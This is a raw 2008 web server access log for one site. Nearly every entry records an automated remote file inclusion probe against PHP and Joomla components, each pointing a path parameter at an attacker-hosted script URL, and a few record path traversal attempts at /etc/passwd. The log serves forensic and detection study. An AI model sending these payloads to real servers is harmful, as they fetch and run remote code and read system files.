124.161.97.124 - - [25/Feb/2008:04:10:49 -0800] "GET /?mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 200 3094 "-" "libwww-perl/5.79" "www.dmulk.com"
124.161.97.124 - - [25/Feb/2008:04:10:50 -0800] "GET /logs/?mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 200 36116 "-" "libwww-perl/5.79" "www.dmulk.com"
201.35.66.58 - - [25/Feb/2008:04:11:32 -0800] "GET /logs/access_080121.log/payment/secpay/config.inc.php?config%5broot_dir%5d=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
201.35.66.58 - - [25/Feb/2008:04:11:34 -0800] "GET /payment/secpay/config.inc.php?config%5broot_dir%5d=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
201.35.66.58 - - [25/Feb/2008:04:11:37 -0800] "GET /logs/payment/secpay/config.inc.php?config%5broot_dir%5d=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.89.74.40 - - [25/Feb/2008:04:11:50 -0800] "GET /logs/access_080101.log/skins/advanced/advanced2.php?pluginpath[0]=http://supercue3.com/screenshots//bius/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
124.161.97.124 - - [25/Feb/2008:04:11:51 -0800] "GET //modules/vwar/admin/admin.php?vwar_root=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
80.86.84.203 - - [25/Feb/2008:04:11:56 -0800] "GET /?mosConfig_absolute_path=http://wsteam.net/include.c?? HTTP/1.1" 200 3094 "-" "libwww-perl/5.803" "www.dmulk.com"
217.160.220.200 - - [25/Feb/2008:04:12:01 -0800] "GET /index.php?s=http://www.leonenmarije.nl/////////////modules/isis.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.23; Mac_PowerPC)" "www.dmulk.com"
217.160.220.200 - - [25/Feb/2008:04:12:02 -0800] "GET /logs/index.php?s=http://www.leonenmarije.nl/////////////modules/isis.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.61 [en] (OS/2; U)" "www.dmulk.com"
80.237.158.11 - - [25/Feb/2008:04:12:02 -0800] "GET /logs/access_071230.log//components/com_simpleboard/image_upload.php?sbp=http://www.geocities.com/giwel/file/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
66.232.156.10 - - [25/Feb/2008:04:12:11 -0800] "GET /logs/access_080117.log//components/com_simpleboard/image_upload.php?sbp=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.232.156.10 - - [25/Feb/2008:04:12:11 -0800] "GET //components/com_simpleboard/image_upload.php?sbp=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.232.156.10 - - [25/Feb/2008:04:12:11 -0800] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
124.161.97.124 - - [25/Feb/2008:04:12:16 -0800] "GET /logs/access_080131.log/?mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
85.13.129.226 - - [25/Feb/2008:04:12:33 -0800] "GET //components/com_zoom/classes/iptc/EXIF_Makernote.php?mosConfig_absolute_path=http://cfemp.com/pdf/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)" "www.dmulk.com"
85.13.129.226 - - [25/Feb/2008:04:12:33 -0800] "GET /logs//components/com_zoom/classes/iptc/EXIF_Makernote.php?mosConfig_absolute_path=http://cfemp.com/pdf/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)" "www.dmulk.com"
66.45.242.50 - - [25/Feb/2008:04:13:19 -0800] "GET /Bmodules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://csinfo.pl/includes/union/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)" "www.dmulk.com"
66.45.242.50 - - [25/Feb/2008:04:13:19 -0800] "GET /logs/Bmodules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://csinfo.pl/includes/union/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)" "www.dmulk.com"
81.23.229.105 - - [25/Feb/2008:04:13:52 -0800] "GET /logs/administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://www.leonenmarije.nl/////////////modules/isis.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6" "www.dmulk.com"
81.23.229.105 - - [25/Feb/2008:04:13:52 -0800] "GET /administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://www.leonenmarije.nl/////////////modules/isis.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511" "www.dmulk.com"
70.84.237.162 - - [25/Feb/2008:04:13:56 -0800] "GET /logs/access_080103.log/skins/advanced/advanced2.php?pluginpath[0]=http://supercue3.com/screenshots//bius/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.84.237.162 - - [25/Feb/2008:04:13:56 -0800] "GET /skins/advanced/advanced2.php?pluginpath[0]=http://supercue3.com/screenshots//bius/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.84.237.162 - - [25/Feb/2008:04:13:57 -0800] "GET /logs/skins/advanced/advanced2.php?pluginpath[0]=http://supercue3.com/screenshots//bius/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
85.120.255.114 - - [25/Feb/2008:04:14:35 -0800] "GET /logs/access_080129.log/administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://verificsmtp.com/x/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.120.255.114 - - [25/Feb/2008:04:14:36 -0800] "GET /logs/administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://verificsmtp.com/x/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
161.58.27.58 - - [25/Feb/2008:04:14:37 -0800] "GET /logs/access_080122.log/skins/advanced/advanced2.php?pluginpath[0]=http://supercue3.com/screenshots//bius/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
200.111.157.66 - - [25/Feb/2008:04:14:42 -0800] "GET /payment/secpay/config.inc.php?config%5broot_dir%5d=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.14.221.150 - - [25/Feb/2008:04:14:48 -0800] "GET /logs/access_080103.log/skins/advanced/advanced2.php?pluginpath[0]=http://supercue3.com/screenshots//bius/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.14.221.150 - - [25/Feb/2008:04:14:48 -0800] "GET /skins/advanced/advanced2.php?pluginpath[0]=http://supercue3.com/screenshots//bius/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.14.221.150 - - [25/Feb/2008:04:14:49 -0800] "GET /logs/skins/advanced/advanced2.php?pluginpath[0]=http://supercue3.com/screenshots//bius/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
210.114.223.160 - - [25/Feb/2008:04:15:03 -0800] "GET /logs/access_080122.log/public/amministrazione/newspublish//include.php?path%5Bdocroot%5D=http://www.plantoursundpartner.de/_scripte/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
210.114.223.160 - - [25/Feb/2008:04:15:04 -0800] "GET /logs/access_080122.log/errors.php?error=http://www.plantoursundpartner.de/_scripte/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
210.114.223.160 - - [25/Feb/2008:04:15:05 -0800] "GET /public/amministrazione/newspublish//include.php?path%5Bdocroot%5D=http://www.plantoursundpartner.de/_scripte/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
210.114.223.160 - - [25/Feb/2008:04:15:05 -0800] "GET /errors.php?error=http://www.plantoursundpartner.de/_scripte/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
210.114.223.160 - - [25/Feb/2008:04:15:06 -0800] "GET /logs/public/amministrazione/newspublish//include.php?path%5Bdocroot%5D=http://www.plantoursundpartner.de/_scripte/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
210.114.223.160 - - [25/Feb/2008:04:15:06 -0800] "GET /logs/errors.php?error=http://www.plantoursundpartner.de/_scripte/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
70.84.237.162 - - [25/Feb/2008:04:15:10 -0800] "GET /logs/access_080122.log/skins/advanced/advanced2.php?pluginpath[0]=http://supercue3.com/screenshots//bius/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
124.161.97.124 - - [25/Feb/2008:04:15:11 -0800] "GET /logs/access_080201.log//modules/vwar/admin/admin.php?vwar_root=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
124.161.97.124 - - [25/Feb/2008:04:15:12 -0800] "GET //modules/vwar/admin/admin.php?vwar_root=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
124.161.97.124 - - [25/Feb/2008:04:15:12 -0800] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
206.221.184.180 - - [25/Feb/2008:04:15:26 -0800] "GET /logs/access_071224.log/PHP_CON/Exchange/include.php?webappcfg[APPPATH]=http://benedon.net/2? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
206.221.184.180 - - [25/Feb/2008:04:15:26 -0800] "GET /logs/PHP_CON/Exchange/include.php?webappcfg[APPPATH]=http://benedon.net/2? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.212.162.98 - - [25/Feb/2008:04:15:26 -0800] "GET /logs/access_080122.log/skins/advanced/advanced2.php?pluginpath[0]=http://supercue3.com/screenshots//bius/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.246.90.123 - - [25/Feb/2008:04:15:36 -0800] "GET /logs/access_080117.log/components/com_simpleboard/image_upload.php?sbp=http://landlordtools.com/dt/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.246.90.123 - - [25/Feb/2008:04:15:41 -0800] "GET /components/com_simpleboard/image_upload.php?sbp=http://landlordtools.com/dt/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.246.90.123 - - [25/Feb/2008:04:15:42 -0800] "GET /logs/components/com_simpleboard/image_upload.php?sbp=http://landlordtools.com/dt/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
84.18.207.64 - - [25/Feb/2008:04:15:47 -0800] "GET //doceboCms/class/class.dashboard_cms.php?where_framework=http://mykonos.bargaingreece.com//components/com_log/Pram_Foxs.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
85.14.221.150 - - [25/Feb/2008:04:16:01 -0800] "GET /logs/access_080122.log/skins/advanced/advanced2.php?pluginpath[0]=http://supercue3.com/screenshots//bius/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
124.161.97.124 - - [25/Feb/2008:04:16:17 -0800] "GET /?mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 200 3094 "-" "libwww-perl/5.79" "www.dmulk.com"
206.221.184.180 - - [25/Feb/2008:04:16:53 -0800] "GET /logs/access_071212.log/PHP_CON/Exchange/include.php?webappcfg[APPPATH]=http://benedon.net/2? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
87.106.9.138 - - [25/Feb/2008:04:17:06 -0800] "GET /logs/access_080201.log/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://canalpt.net/catalog/images/12.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.106.9.138 - - [25/Feb/2008:04:17:06 -0800] "GET /logs/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://canalpt.net/catalog/images/12.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
64.113.122.205 - - [25/Feb/2008:04:17:17 -0800] "GET /logs/access.log//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.ar-vision.com/z.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.113.122.205 - - [25/Feb/2008:04:17:17 -0800] "GET //includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.ar-vision.com/z.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.113.122.205 - - [25/Feb/2008:04:17:17 -0800] "GET /logs//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.ar-vision.com/z.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
220.239.182.219 - - [25/Feb/2008:04:17:48 -0800] "GET /logs/access_080131.loghttp://cccryuan1918ssdf.nightmail.ru/babyboy? HTTP/1.0" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.8) Gecko/20071008 Firefox/2.0.0.8" "www.dmulk.com"
200.111.157.66 - - [25/Feb/2008:04:18:37 -0800] "GET /logs/access_071230.log//modules/vwar/admin/admin.php?vwar_root=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
209.31.183.74 - - [25/Feb/2008:04:18:38 -0800] "GET /logs/access_080201.log/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://notice.se/homepage/images/sida6_4.gif?????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
209.31.183.74 - - [25/Feb/2008:04:18:38 -0800] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://notice.se/homepage/images/sida6_4.gif?????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
209.31.183.74 - - [25/Feb/2008:04:18:38 -0800] "GET /logs/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://notice.se/homepage/images/sida6_4.gif?????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.119.158.50 - - [25/Feb/2008:04:18:38 -0800] "GET /logs/access_080131.log/administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://hornydate.co.uk/sys.txt??? HTTP/1.0" 404 275 "-" "libwww-perl/5.48" "www.dmulk.com"
85.119.158.50 - - [25/Feb/2008:04:18:39 -0800] "GET /administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://hornydate.co.uk/sys.txt??? HTTP/1.0" 404 275 "-" "libwww-perl/5.48" "www.dmulk.com"
85.119.158.50 - - [25/Feb/2008:04:18:39 -0800] "GET /logs/administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://hornydate.co.uk/sys.txt??? HTTP/1.0" 404 275 "-" "libwww-perl/5.48" "www.dmulk.com"
82.112.124.79 - - [25/Feb/2008:04:18:56 -0800] "GET /logs/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=/../../../../../../../../etc/passwd HTTP/1.1" 404 275 "-" "Microsoft Pocket Internet Explorer/0.6" "www.dmulk.com"
82.112.124.79 - - [25/Feb/2008:04:18:57 -0800] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=/../../../../../../../../etc/passwd HTTP/1.1" 404 275 "-" "Microsoft Pocket Internet Explorer/0.6" "www.dmulk.com"
72.30.179.215 - - [25/Feb/2008:04:19:32 -0800] "GET /logs/access_070912.log HTTP/1.0" 200 65147 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
211.197.215.138 - - [25/Feb/2008:04:19:46 -0800] "GET /logs/access_080131.loghttp://cccryuan1918ssdf.nightmail.ru/babyboy? HTTP/1.0" 404 275 "-" "Mozilla/4.75 [en]" "www.dmulk.com"
66.45.242.50 - - [25/Feb/2008:04:20:11 -0800] "GET //components/com_simpleboard/image_upload.php?sbp=http://csinfo.pl/includes/union/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b" "www.dmulk.com"
66.45.242.50 - - [25/Feb/2008:04:20:11 -0800] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://csinfo.pl/includes/union/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511" "www.dmulk.com"
202.142.220.82 - - [25/Feb/2008:04:20:44 -0800] "GET /logs/access_080201.log//modules/vwar/admin/admin.php?vwar_root=http://h1.ripway.com/frizza/Mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
202.142.220.82 - - [25/Feb/2008:04:20:45 -0800] "GET //modules/vwar/admin/admin.php?vwar_root=http://h1.ripway.com/frizza/Mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
202.142.220.82 - - [25/Feb/2008:04:20:45 -0800] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://h1.ripway.com/frizza/Mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
85.119.158.50 - - [25/Feb/2008:04:20:50 -0800] "GET /logs/access_080121.log/administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://hornydate.co.uk/sys.txt??? HTTP/1.0" 404 275 "-" "libwww-perl/5.48" "www.dmulk.com"
68.76.31.154 - - [25/Feb/2008:04:21:03 -0800] "GET /logs/access.log//faqsupport/samplefaqsupport.php?path[docroot]=http://sportzradio.com/poll/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
68.76.31.154 - - [25/Feb/2008:04:21:07 -0800] "GET //faqsupport/samplefaqsupport.php?path[docroot]=http://sportzradio.com/poll/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
68.76.31.154 - - [25/Feb/2008:04:21:07 -0800] "GET /logs//faqsupport/samplefaqsupport.php?path[docroot]=http://sportzradio.com/poll/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
85.214.93.154 - - [25/Feb/2008:04:21:15 -0800] "GET /logs/access_080121.log/payment/secpay/config.inc.php?config%5broot_dir%5d=http://www.thelatinpower.com/modules/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.214.93.154 - - [25/Feb/2008:04:21:15 -0800] "GET /logs/payment/secpay/config.inc.php?config%5broot_dir%5d=http://www.thelatinpower.com/modules/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.148.73.134 - - [25/Feb/2008:04:21:18 -0800] "GET /components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://suwung.890m.com/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "www.dmulk.com"
83.148.73.134 - - [25/Feb/2008:04:21:20 -0800] "GET /logs/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://suwung.890m.com/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "www.dmulk.com"
208.70.184.57 - - [25/Feb/2008:04:21:30 -0800] "GET /logs/access_080201.log/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.geocities.com/giwel/file/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
208.70.184.57 - - [25/Feb/2008:04:21:31 -0800] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.geocities.com/giwel/file/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
208.70.184.57 - - [25/Feb/2008:04:21:31 -0800] "GET /logs/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.geocities.com/giwel/file/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
91.192.194.37 - - [25/Feb/2008:04:21:33 -0800] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://www.sambis.ru/forum/files/sambis.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.105.75.32 - - [25/Feb/2008:04:21:43 -0800] "GET /logs/access.log//components/com_zoom/classes/iptc/EXIF_Makernote.php?mosConfig_absolute_path=http://www.paradstars.com/en/sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
89.108.66.202 - - [25/Feb/2008:04:21:57 -0800] "GET /logs/access_080201.log//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://sportzradio.com/poll/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.105.75.32 - - [25/Feb/2008:04:21:59 -0800] "GET //components/com_zoom/classes/iptc/EXIF_Makernote.php?mosConfig_absolute_path=http://www.paradstars.com/en/sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.105.75.32 - - [25/Feb/2008:04:21:59 -0800] "GET /logs//components/com_zoom/classes/iptc/EXIF_Makernote.php?mosConfig_absolute_path=http://www.paradstars.com/en/sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
65.98.100.202 - - [25/Feb/2008:04:22:48 -0800] "GET //components/com_forum/download.php?phpbb_root_path=http://kaizo.hut2.ru/new/ro.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)" "www.dmulk.com"
65.98.100.202 - - [25/Feb/2008:04:22:49 -0800] "GET /logs//components/com_forum/download.php?phpbb_root_path=http://kaizo.hut2.ru/new/ro.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)" "www.dmulk.com"
65.98.100.202 - - [25/Feb/2008:04:22:49 -0800] "GET //components/com_forum/download.php?phpbb_root_path=http://kaizo.hut2.ru/new/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.61 [en] (OS/2; U)" "www.dmulk.com"
65.98.100.202 - - [25/Feb/2008:04:22:50 -0800] "GET /logs//components/com_forum/download.php?phpbb_root_path=http://kaizo.hut2.ru/new/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.61 [en] (OS/2; U)" "www.dmulk.com"
69.20.54.118 - - [25/Feb/2008:04:23:26 -0800] "GET /logs/access.log%20%20/components/com_zoom/classes/iptc/EXIF_Makernote.php?mosConfig_absolute_path=http://avvvv.altervista.org/start.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
219.136.250.22 - - [25/Feb/2008:04:24:17 -0800] "GET /logs/access_080130.log/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://avvvv.altervista.org/scantxt.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
83.172.144.57 - - [25/Feb/2008:04:24:21 -0800] "GET /logs/access_080131.log/?mosConfig_absolute_path=http://wsteam.net/include.c?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
83.172.144.57 - - [25/Feb/2008:04:24:21 -0800] "GET /logs/access_080131.log/?mosConfig_absolute_path=http://wsteam.net/include.c?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
83.172.144.57 - - [25/Feb/2008:04:24:21 -0800] "GET /logs/?mosConfig_absolute_path=http://wsteam.net/include.c?? HTTP/1.1" 200 36116 "-" "libwww-perl/5.79" "www.dmulk.com"
83.172.144.57 - - [25/Feb/2008:04:24:21 -0800] "GET /logs/?mosConfig_absolute_path=http://wsteam.net/include.c?? HTTP/1.1" 200 36116 "-" "libwww-perl/5.79" "www.dmulk.com"
83.172.144.57 - - [25/Feb/2008:04:24:26 -0800] "GET /logs/access_080117.log/?mosConfig_absolute_path=http://wsteam.net/include.c?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
83.172.144.57 - - [25/Feb/2008:04:24:26 -0800] "GET /logs/access_080117.log/?mosConfig_absolute_path=http://wsteam.net/include.c?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
80.86.84.203 - - [25/Feb/2008:04:24:32 -0800] "GET /logs/access_080201.log/?mosConfig_absolute_path=http://wsteam.net/include.c?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
80.86.84.203 - - [25/Feb/2008:04:24:33 -0800] "GET /logs/?mosConfig_absolute_path=http://wsteam.net/include.c?? HTTP/1.1" 200 36116 "-" "libwww-perl/5.803" "www.dmulk.com"
69.20.54.118 - - [25/Feb/2008:04:24:38 -0800] "GET /logs/components/com_zoom/classes/iptc/EXIF_Makernote.php?mosConfig_absolute_path=http://avvvv.altervista.org/start.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.234.116.170 - - [25/Feb/2008:04:24:42 -0800] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://www.geocities.com/ntchack/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.dmulk.com"
211.234.116.170 - - [25/Feb/2008:04:24:42 -0800] "GET //components/com_simpleboard/image_upload.php?sbp=http://www.geocities.com/ntchack/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)" "www.dmulk.com"
80.86.84.203 - - [25/Feb/2008:04:24:47 -0800] "GET /logs/access_080131.log/?mosConfig_absolute_path=http://wsteam.net/include.c?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
63.246.64.173 - - [25/Feb/2008:04:24:51 -0800] "GET /claroline/tracking/userLog.php?rootSys=http://www.rednetcat.com/cattalk/wp-content/plugins/mygallery/myfunctions/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0" "www.dmulk.com"
63.246.64.173 - - [25/Feb/2008:04:24:52 -0800] "GET /logs/claroline/tracking/userLog.php?rootSys=http://www.rednetcat.com/cattalk/wp-content/plugins/mygallery/myfunctions/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0" "www.dmulk.com"
69.20.54.118 - - [25/Feb/2008:04:25:00 -0800] "GET /logs/access.log%20%20/components/com_zoom/classes/iptc/EXIF_Makernote.php?mosConfig_absolute_path=http://avvvv.altervista.org/start.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
